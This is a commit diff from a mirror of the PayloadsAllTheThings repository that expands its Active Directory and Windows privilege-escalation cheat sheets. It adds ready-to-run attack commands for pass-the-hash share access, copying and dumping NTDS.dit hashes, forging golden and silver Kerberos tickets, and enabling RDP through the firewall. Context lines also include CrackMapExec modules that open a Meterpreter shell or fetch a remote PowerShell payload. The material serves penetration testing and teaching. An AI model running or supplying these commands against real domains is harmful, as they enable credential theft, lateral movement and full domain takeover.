mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
PassTheTicket + OpenShare + Tools(CME example)
This commit is contained in:
parent
4cf28496e0
commit
cdc3adee51
5 changed files with 98 additions and 21 deletions
|
@ -4,10 +4,12 @@
|
||||||
* [Tools](#tools)
|
* [Tools](#tools)
|
||||||
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
|
||||||
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
* [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
|
||||||
|
* [Open Shares](#open-shares)
|
||||||
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
* [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
|
||||||
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
* [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
|
||||||
* [Golden Tickets](#golden-tickets)
|
* [Password in AD User comment](#password-in-ad-user-comment)
|
||||||
* [Silver Tickets](#silver-tickets)
|
* [Golden Tickets](#passtheticket-golden-tickets)
|
||||||
|
* [Silver Tickets](#passtheticket-silver-tickets)
|
||||||
* [Trust Tickets](#trust-tickets)
|
* [Trust Tickets](#trust-tickets)
|
||||||
* [Kerberoast](#kerberoast)
|
* [Kerberoast](#kerberoast)
|
||||||
* [Pass-the-Hash](#pass-the-hash)
|
* [Pass-the-Hash](#pass-the-hash)
|
||||||
|
@ -33,6 +35,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||||
|
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||||
```
|
```
|
||||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -55,6 +58,20 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
|
||||||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Open Shares
|
||||||
|
```powershell
|
||||||
|
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||||
|
ls # list files
|
||||||
|
cd
|
||||||
|
get # download files
|
||||||
|
put # replace a file
|
||||||
|
```
|
||||||
|
|
||||||
|
Mount a share
|
||||||
|
```powershell
|
||||||
|
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
### GPO - Pivoting with Local Admin & Passwords in SYSVOL
|
||||||
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
|
||||||
|
@ -106,6 +123,21 @@ vssadmin create shadow /for=C :
|
||||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||||
|
```powershell
|
||||||
|
Import-Module .\Copy-VSS.ps1
|
||||||
|
Copy-VSS
|
||||||
|
Copy-VSS -DestinationDir C:\ShadowCopy\
|
||||||
|
```
|
||||||
|
|
||||||
|
**Using vssadmin**
|
||||||
|
```powershell
|
||||||
|
vssadmin create shadow /for=C:
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
|
||||||
|
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
**Using DiskShadow (a Windows signed binary)**
|
**Using DiskShadow (a Windows signed binary)**
|
||||||
```powershell
|
```powershell
|
||||||
diskshadow.txt contains :
|
diskshadow.txt contains :
|
||||||
|
@ -118,6 +150,7 @@ delete shadows volume %someAlias%
|
||||||
reset
|
reset
|
||||||
|
|
||||||
then:
|
then:
|
||||||
|
NOTE - must be executed from C:\Windows\System32
|
||||||
diskshadow.exe /s c:\diskshadow.txt
|
diskshadow.exe /s c:\diskshadow.txt
|
||||||
dir c:\exfil
|
dir c:\exfil
|
||||||
reg.exe save hklm\system c:\exfil\system.bak
|
reg.exe save hklm\system c:\exfil\system.bak
|
||||||
|
@ -126,11 +159,12 @@ reg.exe save hklm\system c:\exfil\system.bak
|
||||||
**Extract hashes from ntds.dit**
|
**Extract hashes from ntds.dit**
|
||||||
then you need to use secretsdump to extract the hashes
|
then you need to use secretsdump to extract the hashes
|
||||||
```c
|
```c
|
||||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
|
||||||
```
|
```
|
||||||
secretsdump also works remotely
|
secretsdump also works remotely
|
||||||
```c
|
```c
|
||||||
./secretsdump.py IP administrator@domain -use-vss
|
./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
|
||||||
|
./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
@ -150,7 +184,7 @@ CrackMapExec module
|
||||||
cme smb 10.10.0.202 -u username -p password --ntds vss
|
cme smb 10.10.0.202 -u username -p password --ntds vss
|
||||||
```
|
```
|
||||||
|
|
||||||
## Password in AD User comment
|
### Password in AD User comment
|
||||||
```powershell
|
```powershell
|
||||||
enum4linux | grep -i desc
|
enum4linux | grep -i desc
|
||||||
There are 3-4 fields that seem to be common in most AD schemas:
|
There are 3-4 fields that seem to be common in most AD schemas:
|
||||||
|
@ -158,7 +192,7 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Golden Tickets
|
### PassTheTicket Golden Tickets
|
||||||
Forge a TGT, require krbtgt key
|
Forge a TGT, require krbtgt key
|
||||||
|
|
||||||
Mimikatz version
|
Mimikatz version
|
||||||
|
@ -187,11 +221,36 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck
|
||||||
kerberos_ticket_list
|
kerberos_ticket_list
|
||||||
```
|
```
|
||||||
|
|
||||||
### Silver Tickets
|
Using a ticket on Linux
|
||||||
Forge a TGS, require machine accound password (key) from the KDC
|
```powershell
|
||||||
|
Convert the ticket kirbi to ccache with kekeo
|
||||||
|
misc::convert ccache ticket.kirbi
|
||||||
|
|
||||||
|
Alternatively you can use ticketer from Impacket
|
||||||
|
./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
|
||||||
|
|
||||||
|
export KRB5CCNAME=/home/user/ticket.ccache
|
||||||
|
cat $KRB5CCNAME
|
||||||
|
|
||||||
|
|
||||||
|
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
|
||||||
|
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||||
|
```
|
||||||
|
|
||||||
|
### PassTheTicket Silver Tickets
|
||||||
|
Forging a TGS require machine accound password (key) from the KDC
|
||||||
|
```powershell
|
||||||
|
Create a ticket for the service
|
||||||
|
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
|
||||||
|
|
||||||
|
Then use the same steps as a Golden ticket
|
||||||
|
misc::convert ccache ticket.kirbi
|
||||||
|
export KRB5CCNAME=/home/user/ticket.ccache
|
||||||
|
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100
|
||||||
|
```
|
||||||
|
|
||||||
### Trust Tickets
|
### Trust Tickets
|
||||||
|
TODO
|
||||||
|
|
||||||
### Kerberoast
|
### Kerberoast
|
||||||
```c
|
```c
|
||||||
|
@ -275,6 +334,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
|
||||||
|
|
||||||
|
|
||||||
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
|
||||||
|
Check if the patch is installed : `wmic qfe list | find "3139914"`
|
||||||
```
|
```
|
||||||
Powershell:
|
Powershell:
|
||||||
https://www.exploit-db.com/exploits/39719/
|
https://www.exploit-db.com/exploits/39719/
|
||||||
|
@ -314,5 +374,6 @@ net group "Domain Admins" hacker2 /add /domain
|
||||||
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
||||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
||||||
|
* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/)
|
|
@ -56,3 +56,4 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||||
|
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
|
@ -92,28 +92,29 @@ net share
|
||||||
|
|
||||||
## Looting for passwords
|
## Looting for passwords
|
||||||
|
|
||||||
Search for file contents
|
### Search for file contents**
|
||||||
```powershell
|
```powershell
|
||||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
Search for a file with a certain filename
|
### Search for a file with a certain filename
|
||||||
```powershell
|
```powershell
|
||||||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||||
```
|
```
|
||||||
|
|
||||||
Search the registry for key names
|
### Search the registry for key names
|
||||||
```powershell
|
```powershell
|
||||||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||||
```
|
```
|
||||||
|
|
||||||
Read a value of a certain sub key
|
### Read a value of a certain sub key
|
||||||
```powershell
|
```powershell
|
||||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||||
```
|
```
|
||||||
|
|
||||||
Password in unattend.xml
|
### Password in unattend.xml
|
||||||
|
Location of the unattend.xml files
|
||||||
```powershell
|
```powershell
|
||||||
C:\unattend.xml
|
C:\unattend.xml
|
||||||
C:\Windows\Panther\Unattend.xml
|
C:\Windows\Panther\Unattend.xml
|
||||||
|
@ -121,6 +122,8 @@ C:\Windows\Panther\Unattend\Unattend.xml
|
||||||
C:\Windows\system32\sysprep.inf
|
C:\Windows\system32\sysprep.inf
|
||||||
C:\Windows\system32\sysprep\sysprep.xml
|
C:\Windows\system32\sysprep\sysprep.xml
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Example content
|
||||||
```powershell
|
```powershell
|
||||||
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
|
||||||
<AutoLogon>
|
<AutoLogon>
|
||||||
|
@ -183,3 +186,5 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS
|
||||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||||
|
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
|
||||||
|
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
|
|
@ -68,16 +68,20 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||||
```
|
```
|
||||||
|
|
||||||
## RDP Remote Desktop Protocol (Impacket)
|
## RDP Remote Desktop Protocol (Impacket)
|
||||||
```
|
```powershell
|
||||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5
|
||||||
```
|
```
|
||||||
|
|
||||||
Note: you may need to enable it with the following command
|
Note: you may need to enable it with the following command
|
||||||
```
|
```powershell
|
||||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
|
||||||
|
netsh firewall set service remoteadmin enable
|
||||||
|
netsh firewall set service remotedesktop enable
|
||||||
```
|
```
|
||||||
|
|
||||||
or with psexec(sysinternals)
|
or with psexec(sysinternals)
|
||||||
```
|
```powershell
|
||||||
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -86,6 +90,12 @@ For Server 2012 R2, Win8.1+
|
||||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
|
||||||
```
|
```
|
||||||
|
|
||||||
|
with Metasploit
|
||||||
|
```powershell
|
||||||
|
run getgui -u admin -p 1234
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Netuse (Windows)
|
## Netuse (Windows)
|
||||||
```
|
```
|
||||||
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
# Payloads All The Things
|
# Payloads All The Things
|
||||||
A list of useful payloads and bypasses for Web Application Security.
|
A list of useful payloads and bypasses for Web Application Security.
|
||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
I <3 pull requests :) You can also contribute with a beer IRL or a [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
I <3 pull requests :) You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
||||||
|
|
||||||
Every section contains:
|
Every section contains:
|
||||||
- README.md - vulnerability description and how to exploit it
|
- README.md - vulnerability description and how to exploit it
|
||||||
|
|
Loading…
Reference in a new issue